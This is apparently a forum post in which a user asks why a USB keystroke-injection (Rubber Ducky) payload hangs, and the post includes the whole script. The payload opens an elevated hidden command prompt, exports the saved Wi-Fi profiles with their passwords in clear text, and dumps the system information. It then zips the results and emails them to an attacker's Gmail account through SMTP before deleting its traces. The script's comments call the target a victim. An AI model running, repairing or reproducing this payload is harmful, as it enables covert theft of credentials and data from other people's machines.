Is this great looking Payload still working? i ran it and it gets hung on UA and then sending me a email. Reds out during writing heres what i have.
REM Author: Zeta REM Date: 4/5/15 REM Description: This program collects the computer info and wifi passwords of the victim and emails it to attackers gmail. REM------------------------OPEN & HIDE------------------------ DELAY 750 GUI r DELAY 400 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 555 ALT y DELAY 555 ENTER ENTER ALT SPACE STRING M DOWNARROW REPEAT 111 ENTER REM ----------------------COLLECT & DUMP---------------------- STRING set TEMPDIR=%systemdrive%\de-temp ENTER STRING mkdir %TEMPDIR% ENTER STRING cd %TEMPDIR% ENTER STRING netsh wlan export profile key=clear ENTER STRING set > info.txt ENTER STRING cd.. ENTER REM ---------------------------------------------ZIPPING FILE--------------------------------------------- DELAY 450 STRING echo Set objArgs = WScript.Arguments > _zipIt.vbs ENTER STRING echo InputFolder = objArgs(0) >> _zipIt.vbs ENTER STRING echo ZipFile = objArgs(1) >> _zipIt.vbs ENTER STRING echo CreateObject("Scripting.FileSystemObject").CreateTextFile(ZipFile, True).Write "PK" ^& Chr(5) ^& Chr(6) ^& String(18, vbNullChar) >> _zipIt.vbs ENTER STRING echo Set objShell = CreateObject("Shell.Application") >> _zipIt.vbs ENTER STRING echo Set source = objShell.NameSpace(InputFolder).Items >> _zipIt.vbs ENTER STRING echo objShell.NameSpace(ZipFile).CopyHere(source) >> _zipIt.vbs ENTER STRING echo wScript.Sleep 2000 >> _zipIt.vbs ENTER STRING CScript _zipIt.vbs %TEMPDIR% %systemdrive%\de-temp.zip ENTER DELAY 200 REM -----------------------------------EMAIL LOG VIA GMAIL----------------------------------- STRING powershell.exe -command $SMTPServer = 'smtp.gmail.com'; $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587); $SMTPInfo.EnableSsl = $true; $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('ishineblue', 'PWHERE'); $ReportEmail = New-Object System.Net.Mail.MailMessage; $ReportEmail.From = 'ishineblue@gmail.com'; $ReportEmail.To.Add('ishineblue@gmail.com'); $ReportEmail.Attachments.Add('%systemdrive%\de-temp.zip'); $ReportEmail.Subject = '%computername%'; $SMTPInfo.Send($ReportEmail) ENTER DELAY 100 REM ---------------------DELETE AND END--------------------- STRING RD /S /Q "%systemdrive%\de-temp" ENTER STRING TYPE nul > %systemdrive%\de-temp.zip ENTER STRING DEL /Q %systemdrive%\de-temp.zip ENTER STRING TYPE nul > %systemdrive%\_zipIt.vbs ENTER STRING DEL /Q %systemdrive%\_zipIt.vbs ENTER STRING exit ENTER